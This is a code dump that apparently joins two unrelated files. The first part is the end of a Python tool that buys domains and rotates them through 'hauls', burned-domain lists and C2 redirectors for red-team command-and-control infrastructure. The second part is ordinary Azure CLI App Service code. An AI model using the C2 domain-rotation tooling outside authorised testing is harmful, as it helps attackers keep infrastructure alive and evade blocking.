domains_types[haul_option].append(actual_domains[int(domain_option)]) domains.remove(actual_domains[int(domain_option)]) else: print("[+] No available domains in pool. Buy another domain") if command == '3': print("[+] Domains by Haul:") for i in domains_types: print("Haul "+i) for j in domains_types[i]: print(j) #remove pass #change priority of domains inside haul (priority of rotation) if command == '4': print("[+] Select Haul") for i in domains_types: print("[+] "+i) print("[+] 1000) Back") haul_option = input("Haul: ") if haul_option != "1000": print("[+] Select domain to move priority: ") if bool(domains_types[haul_option]): for index, item in enumerate(domains_types[haul_option]): print(str(index) +") "+item) domain_option = input("Option Number: ") print("[+] Select position to move the domain [Position 1 = Highest priority]: ") position_option = input("Position Number: ") domain_item = domains_types[haul_option].pop(int(domain_option)) domains_types[haul_option].insert(int(position_option)-1, domain_item) else: print("[-] No domains in haul") if command == '5': print("[+] Select print option: ") print("1) All Domains in Pool") print("2) All Available Domains (not burned, not in use, not in a haul)") print("3) All Burned Domains") print("4) Domains in Use") print("5) Domains by Haul") option_number = input("Option Number: ") if int(option_number) == 1: print(domains) if int(option_number) == 2: actual_domains = set(domains) - set(domains_in_use) - set(burned_domains) print(actual_domains) if int(option_number) == 3: print(burned_domains) if int(option_number) == 4: print(domains_in_use) if int(option_number) == 5: for i in domains_types: print("[-] Haul "+i) for k in domains_types[i]: print(k) if command == '6': if "No pending migrations" in situational_message_6: print("You have no pending migrations") else: damaged_components() if command == '7': if "[No pending discards]" in situational_message_7: print("You have no pending discards") else: discard_components() if command == '8': show_infra() if command == '9': pass #add c2 profiles if command == '10': pass #start migration if command == '11': pass #edit htaccess redirector if command == '12': pass #edit c2_profile if command == '13': set_apis() if command == '14': kill_all() except Exception as e: print("Error: ") print(e) def restricted_menu(): global api, domains_types, domains, burned_domains, temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu check = False haul_option = "" while check == False: print(f"{bcolors.OKGREEN}[+] Choose an option:{bcolors.ENDC}") print("1) Buy domain") print("2) Move domain to a haul") try: command = input(f"{bcolors.BOLD}Select: {bcolors.ENDC}") if command == '1': domain_name = input("Insert domain name: ") result_call = namecheap_handler.buy_domain(domain_name) if result_call == False: print(f"{bcolors.FAIL}[+] Domain not available{bcolors.ENDC}") else: print(f"{bcolors.OKBLUE}[+] Domain successfuly acquired{bcolors.ENDC}") temp_domains = list(api.domains_getList()) for i in temp_domains: domains.append(i['name']) if command == '2': print(f"{bcolors.BOLD}[+] Select Domains to move to a haul: {bcolors.ENDC}") actual_domains = set(domains) - set(domains_in_use) - set(burned_domains) if len(actual_domains) < len(domains_types): print("[+] You don't have enough domains for each haul. Buy another domain") sys.exit() print("[+] You are configuring the following haul's: ") for i in domains_types: print("[+] " + i) print("") for k in domains_types: actual_domains = set(domains) - set(domains_in_use) - set(burned_domains) print("[+] Select one of the available domains to move to the haul "+k) if len(actual_domains) > 0: for index, item in enumerate(actual_domains): print(str(index) + ") " + item) domain_option = input("Option: ") worked = False while worked == False: worked = True for i in domains_types: if domain_option in domains_types[i]: print("Domain is already present in haul" +i) print("Select another domain") domain_option = input("Option: ") worked = False print("Moving domain to haul "+k) actual_domains = list(actual_domains) domains_types[k].append(actual_domains[int(domain_option)]) domains.remove(actual_domains[int(domain_option)]) except Exception as e: print(e) check = True def main(): global domains_long,domains_short, domains, api,message_queu,backup_restored,domains_types digital_ocean_token = config.digital_ocean_token message_queu["action1"] = [] message_queu["action2"] = [] message_queu["action3"] = [] message_queu["action4"] = [] message_queu["action5"] = [] message_queu["action6"] = [] message_queu["action7"] = [] if config.namecheap_key == "": print(f"{bcolors.FAIL}[+] Namecheap API Key missing{bcolors.ENDC}") sys.exit() if config.apivoid_key == "": print(f"{bcolors.FAIL}[+] APIVoid API Key missing{bcolors.ENDC}") sys.exit(0) api = Api(config.namecheap_username, config.namecheap_key, config.namecheap_ipaddress, sandbox=False) for i in config.names: domains_types[i] = config.names[i] temp_domains = list(api.domains_getList()) backup_restored = check_backup() for i in temp_domains: domains.append(i['name']) check_names = True for i in config.names: if len(config.names[i]) == 0: check_names = False break if check_names == False: check_names = True for i in domains_types: if len(domains_types[i]) == 0: print("[+] No domains found in haul "+ i) check_names = False if check_names == False: restricted_menu() thread = Thread(target=set_and_check) thread.start() thread2 = Thread(target=menu) thread2.start() thread.join() thread2.join() main()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import threading import time import ast try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse # pylint: disable=import-error from binascii import hexlify from os import urandom import datetime import json import ssl import sys import uuid from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports import OpenSSL.crypto from fabric import Connection from knack.prompting import prompt_pass, NoTTYException from knack.util import CLIError from knack.log import get_logger from msrestazure.azure_exceptions import CloudError from msrestazure.tools import is_valid_resource_id, parse_resource_id from azure.mgmt.storage import StorageManagementClient from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient from azure.mgmt.relay.models import AccessRights from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory from azure.storage.blob import BlockBlobService, BlobPermissions from azure.cli.command_modules.network._client_factory import network_client_factory from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.commands import LongRunningOperation from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \ ConfiguredDefaultSetter, sdk_no_wait from azure.cli.core.commands.client_factory import UA_AGENT from azure.cli.core.profiles import ResourceType from .tunnel import TunnelServer from .vsts_cd_provider import VstsContinuousDeliveryProvider from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES from ._client_factory import web_client_factory, ex_handler_factory from ._appservice_utils import _generic_site_operation from .utils import _normalize_sku, get_sku_name from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details, should_create_new_rg, set_location, does_app_already_exist, get_profile_username, get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use, detect_os_form_src) from ._constants import (RUNTIME_TO_DEFAULT_VERSION_FUNCTIONAPP, NODE_VERSION_DEFAULT_FUNCTIONAPP, RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT) logger = get_logger(__name__) # pylint:disable=no-member,too-many-lines,too-many-locals # region "Common routines shared with quick-start extensions." # Please maintain compatibility in both interfaces and functionalities" def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None, multicontainer_config_type=None, multicontainer_config_file=None, tags=None, using_webapp_up=False, language=None): SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models( 'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair') if deployment_source_url and deployment_local_git: raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git') docker_registry_server_url = parse_docker_image_name(deployment_container_image_name) client = web_client_factory(cmd.cli_ctx) if is_valid_resource_id(plan): parse_result = parse_resource_id(plan) plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name']) else: plan_info = client.app_service_plans.get(resource_group_name, plan) if not plan_info: raise CLIError("The plan '{}' doesn't exist".format(plan)) is_linux = plan_info.reserved node_default_version = NODE_VERSION_DEFAULT location = plan_info.location site_config = SiteConfig(app_settings=[]) if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1', 'B1', 'B2', 'B3', 'BASIC']: site_config.always_on = True webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags, https_only=using_webapp_up) helper = _StackRuntimeHelper(cmd, client, linux=is_linux) if is_linux: if not validate_container_app_create_options(runtime, deployment_container_image_name, multicontainer_config_type, multicontainer_config_file): raise CLIError("usage error: --runtime | --deployment-container-image-name |" " --multicontainer-config-type TYPE --multicontainer-config-file FILE") if startup_file: site_config.app_command_line = startup_file if runtime: site_config.linux_fx_version = runtime match = helper.resolve(runtime) if not match: raise CLIError("Linux Runtime '{}' is not supported." "Please invoke 'list-runtimes' to cross check".format(runtime)) elif deployment_container_image_name: site_config.linux_fx_version = _format_fx_version(deployment_container_image_name) site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE", value="false")) elif multicontainer_config_type and multicontainer_config_file: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) elif plan_info.is_xenon: # windows container webapp site_config.windows_fx_version = _format_fx_version(deployment_container_image_name) elif runtime: # windows webapp with runtime specified if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]): raise CLIError("usage error: --startup-file or --deployment-container-image-name or " "--multicontainer-config-type and --multicontainer-config-file is " "only appliable on linux webapp") match = helper.resolve(runtime) if not match: raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long match['setter'](cmd=cmd, stack=match, site_config=site_config) # Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack if not match['displayName'].startswith('node'): site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION", value=node_default_version)) else: # windows webapp without runtime specified site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION", value=node_default_version)) if site_config.app_settings: for setting in site_config.app_settings: logger.info('Will set appsetting %s', setting) if using_webapp_up: # when the routine is invoked as a help method for webapp up logger.info("will set appsetting for enabling build") site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True)) if language is not None and language.lower() == 'dotnetcore': site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK', value='https://{}.scm.azurewebsites.net/detectors'.format(name))) poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def) webapp = LongRunningOperation(cmd.cli_ctx)(poller) # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name) if deployment_container_image_name: update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password=docker_registry_server_password) return webapp def validate_container_app_create_options(runtime=None, deployment_container_image_name=None, multicontainer_config_type=None, multicontainer_config_file=None): if bool(multicontainer_config_type) != bool(multicontainer_config_file): return False opts = [runtime, deployment_container_image_name, multicontainer_config_type] return len([x for x in opts if x]) == 1 # you can only specify one out the combinations def parse_docker_image_name(deployment_container_image_name): if not deployment_container_image_name: return None slash_ix = deployment_container_image_name.rfind('/') docker_registry_server_url = deployment_container_image_name[0:slash_ix] if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url): return None return docker_registry_server_url def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None): if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) result, slot_result = {}, {} # pylint: disable=too-many-nested-blocks for src, dest in [(settings, result), (slot_settings, slot_result)]: for s in src: try: temp = shell_safe_json_parse(s) if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command for t in temp: if t.get('slotSetting', True): slot_result[t['name']] = t['value'] # Mark each setting as the slot setting else: result[t['name']] = t['value'] else: dest.update(temp) except CLIError: setting_name, value = s.split('=', 1) dest[setting_name] = value result.update(slot_result) for setting_name, value in result.items(): app_settings.properties[setting_name] = value client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings.properties, slot, client) app_settings_slot_cfg_names = [] if slot_result: new_slot_setting_names = slot_result.keys() slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or [] slot_cfg_names.app_setting_names += new_slot_setting_names app_settings_slot_cfg_names = slot_cfg_names.app_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _build_app_settings_output(result.properties, app_settings_slot_cfg_names) def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name, share_name, access_key, mount_path=None, slot=None, slot_setting=False): AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue') azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) if custom_id in azure_storage_accounts.properties: raise CLIError("Site already configured with an Azure storage account with the id '{}'. " "Use 'az webapp config storage-account update' to update an existing " "Azure storage account configuration.".format(custom_id)) azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name, share_name=share_name, access_key=access_key, mount_path=mount_path) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts.properties, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None, share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False): AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue') azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) existing_account_config = azure_storage_accounts.properties.pop(custom_id, None) if not existing_account_config: raise CLIError("No Azure storage account configuration found with the id '{}'. " "Use 'az webapp config storage-account add' to add a new " "Azure storage account configuration.".format(custom_id)) new_account_config = AzureStorageInfoValue( type=storage_type or existing_account_config.type, account_name=account_name or existing_account_config.account_name, share_name=share_name or existing_account_config.share_name, access_key=access_key or existing_account_config.access_key, mount_path=mount_path or existing_account_config.mount_path ) azure_storage_accounts.properties[custom_id] = new_account_config client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts.properties, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None): client = web_client_factory(cmd.cli_ctx) app = client.web_apps.get(resource_group_name, name) if app is None: raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. ' 'Please make sure these values are correct.'.format(name, resource_group_name)) parse_plan_id = parse_resource_id(app.server_farm_id) plan_info = None retry_delay = 10 # seconds # We need to retry getting the plan because sometimes if the plan is created as part of function app, # it can take a couple of tries before it gets the plan for _ in range(5): plan_info = client.app_service_plans.get(parse_plan_id['resource_group'], parse_plan_id['name']) if plan_info is not None: break time.sleep(retry_delay) if build_remote and not app.reserved: raise CLIError('Remote build is only available on Linux function apps') is_consumption = is_plan_consumption(cmd, plan_info) if (not build_remote) and is_consumption and app.reserved: return upload_zip_to_storage(cmd, resource_group_name, name, src, slot) if build_remote: add_remote_build_app_settings(cmd, resource_group_name, name, slot) else: remove_remote_build_app_settings(cmd, resource_group_name, name, slot) return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot) def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None): return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot) def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None): logger.warning("Getting scm site credentials for zip deployment") user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) try: scm_url = _get_scm_url(cmd, resource_group_name, name, slot) except ValueError: raise CLIError('Failed to fetch scm url for function app') zip_url = scm_url + '/api/zipdeploy?isAsync=true' deployment_status_url = scm_url + '/api/deployments/latest' import urllib3 authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) headers = authorization headers['content-type'] = 'application/octet-stream' headers['User-Agent'] = UA_AGENT import requests import os from azure.cli.core.util import should_disable_connection_verify # Read file content with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs: zip_content = fs.read() logger.warning("Starting zip deployment. This operation can take a while to complete ...") res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify()) logger.warning("Deployment endpoint responded with status code %d", res.status_code) # check if there's an ongoing process if res.status_code == 409: raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. " "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting " "is removed.".format(deployment_status_url)) # check the status of async deployment response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url, authorization, timeout) return response def add_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) enable_oryx_build = None scm_do_build_during_deployment = None website_run_from_package = None for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'ENABLE_ORYX_BUILD': enable_oryx_build = value in ('true', '1') if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE': website_run_from_package = value if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)): logger.warning("Setting ENABLE_ORYX_BUILD to true") logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true") update_app_settings(cmd, resource_group_name, name, [ "ENABLE_ORYX_BUILD=true", "SCM_DO_BUILD_DURING_DEPLOYMENT=true" ], slot) time.sleep(5) if website_run_from_package is not None: logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting") delete_app_settings(cmd, resource_group_name, name, [ "WEBSITE_RUN_FROM_PACKAGE" ], slot) time.sleep(5) def remove_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) enable_oryx_build = None scm_do_build_during_deployment = None for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'ENABLE_ORYX_BUILD': enable_oryx_build = value in ('true', '1') if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)): logger.warning("Setting ENABLE_ORYX_BUILD to false") logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false") update_app_settings(cmd, resource_group_name, name, [ "ENABLE_ORYX_BUILD=false", "SCM_DO_BUILD_DURING_DEPLOYMENT=false" ], slot) time.sleep(5) def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) storage_connection = None for keyval in settings: if keyval['name'] == 'AzureWebJobsStorage': storage_connection = str(keyval['value']) if storage_connection is None: raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting') container_name = "function-releases" blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4())) block_blob_service = BlockBlobService(connection_string=storage_connection) if not block_blob_service.exists(container_name): block_blob_service.create_container(container_name) # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3 def progress_callback(current, total): total_length = 30 filled_length = int(round(total_length * current) / float(total)) percents = round(100.0 * current / float(total), 1) progress_bar = '=' * filled_length + '-' * (total_length - filled_length) progress_message = 'Uploading {} {}%'.format(progress_bar, percents) cmd.cli_ctx.get_progress_controller().add(message=progress_message) block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True, progress_callback=progress_callback) now = datetime.datetime.now() blob_start = now - datetime.timedelta(minutes=10) blob_end = now + datetime.timedelta(weeks=520) blob_token = block_blob_service.generate_blob_shared_access_signature(container_name, blob_name, permission=BlobPermissions(read=True), expiry=blob_end, start=blob_start) blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token) website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri) update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting]) client = web_client_factory(cmd.cli_ctx) try: logger.info('\nSyncing Triggers...') if slot is not None: client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot) else: client.web_apps.sync_function_triggers(resource_group_name, name) except CloudError as ce: # This SDK function throws an error if Status Code is 200 if ce.status_code != 200: raise ce def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name, setting_properties, slot=None, client=None): client = client or web_client_factory(cli_ctx) operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot') if slot is None: return operation(resource_group_name, name, str, setting_properties) return operation(resource_group_name, name, slot, str, setting_properties) def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None): webapp = app_instance if not app_instance: # when the routine is invoked as a help method, not through commands webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not webapp: raise CLIError("'{}' app doesn't exist".format(name)) _rename_server_farm_props(webapp) _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot) return webapp # for generic updater def get_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): instance = kwargs['parameters'] client = web_client_factory(cmd.cli_ctx) updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance, skip_dns_registration=skip_dns_registration, skip_custom_domain_verification=skip_custom_domain_verification, force_dns_registration=force_dns_registration, ttl_in_seconds=ttl_in_seconds) if slot: kwargs['slot'] = slot return updater(**kwargs) def update_webapp(instance, client_affinity_enabled=None, https_only=None): if 'function' in instance.kind: raise CLIError("please use 'az functionapp update' to update this function app") if client_affinity_enabled is not None: instance.client_affinity_enabled = client_affinity_enabled == 'true' if https_only is not None: instance.https_only = https_only == 'true' return instance def update_functionapp(cmd, instance, plan=None): client = web_client_factory(cmd.cli_ctx) if plan is not None: if is_valid_resource_id(plan): dest_parse_result = parse_resource_id(plan) dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'], dest_parse_result['name']) else: dest_plan_info = client.app_service_plans.get(instance.resource_group, plan) if dest_plan_info is None: raise CLIError("The plan '{}' doesn't exist".format(plan)) validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info) instance.server_farm_id = dest_plan_info.id return instance def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance): general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.' src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id) src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'], src_parse_result['name']) if src_plan_info is None: raise CLIError('Could not determine the current plan of the functionapp') if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)): raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg) if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)): raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' + general_switch_msg) def set_functionapp(cmd, resource_group_name, name, **kwargs): instance = kwargs['parameters'] if 'function' not in instance.kind: raise CLIError('Not a function app to update') client = web_client_factory(cmd.cli_ctx) return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance) def list_webapp(cmd, resource_group_name=None): result = _list_app(cmd.cli_ctx, resource_group_name) return [r for r in result if 'function' not in r.kind] def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None): result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot) return sorted(result, key=lambda site: site.deleted_site_id) def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None): DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest') request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request) def list_function_app(cmd, resource_group_name=None): result = _list_app(cmd.cli_ctx, resource_group_name) return [r for r in result if 'function' in r.kind] def _list_app(cli_ctx, resource_group_name=None): client = web_client_factory(cli_ctx) if resource_group_name: result = list(client.web_apps.list_by_resource_group(resource_group_name)) else: result = list(client.web_apps.list()) for webapp in result: _rename_server_farm_props(webapp) return result def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None): client = web_client_factory(cli_ctx) locations = _get_deleted_apps_locations(cli_ctx) result = list() for location in locations: result = result + list(client.deleted_web_apps.list_by_location(location)) if resource_group_name: result = [r for r in result if r.resource_group == resource_group_name] if name: result = [r for r in result if r.deleted_site_name.lower() == name.lower()] if slot: result = [r for r in result if r.slot.lower() == slot.lower()] return result def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None): ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity') def getter(): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def setter(webapp): webapp.identity = ManagedServiceIdentity(type='SystemAssigned') poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp) return LongRunningOperation(cmd.cli_ctx)(poller) from azure.cli.core.commands.arm import assign_identity as _assign_identity webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope) return webapp.identity def show_identity(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity def remove_identity(cmd, resource_group_name, name, slot=None): ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity') def getter(): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def setter(webapp): webapp.identity = ManagedServiceIdentity(type='None') poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp) return LongRunningOperation(cmd.cli_ctx)(poller) from azure.cli.core.commands.arm import assign_identity as _assign_identity webapp = _assign_identity(cmd.cli_ctx, getter, setter) return webapp.identity def get_auth_settings(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot) def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument client_id=None, token_store_enabled=None, # pylint: disable=unused-argument token_refresh_extension_hours=None, # pylint: disable=unused-argument allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument microsoft_account_client_secret=None, # pylint: disable=unused-argument microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument auth_settings = get_auth_settings(cmd, resource_group_name, name, slot) UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction') if action == 'AllowAnonymous': auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous elif action: auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page auth_settings.default_provider = AUTH_TYPES[action] import inspect frame = inspect.currentframe() bool_flags = ['enabled', 'token_store_enabled'] # note: getargvalues is used already in azure.cli.core.commands. # and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[2:]: if values.get(arg, None): setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings) def list_runtimes(cmd, linux=False): client = web_client_factory(cmd.cli_ctx) runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux) return [s['displayName'] for s in runtime_helper.stacks] def _rename_server_farm_props(webapp): # Should be renamed in SDK in a future release setattr(webapp, 'app_service_plan_id', webapp.server_farm_id) del webapp.server_farm_id return webapp def delete_function_app(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot) def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None, keep_dns_registration=None, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.delete_slot(resource_group_name, name, slot, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None, skip_dns_registration=False if keep_dns_registration else None) else: client.web_apps.delete(resource_group_name, name, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None, skip_dns_registration=False if keep_dns_registration else None) def stop_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot) def start_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot) def restart_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, 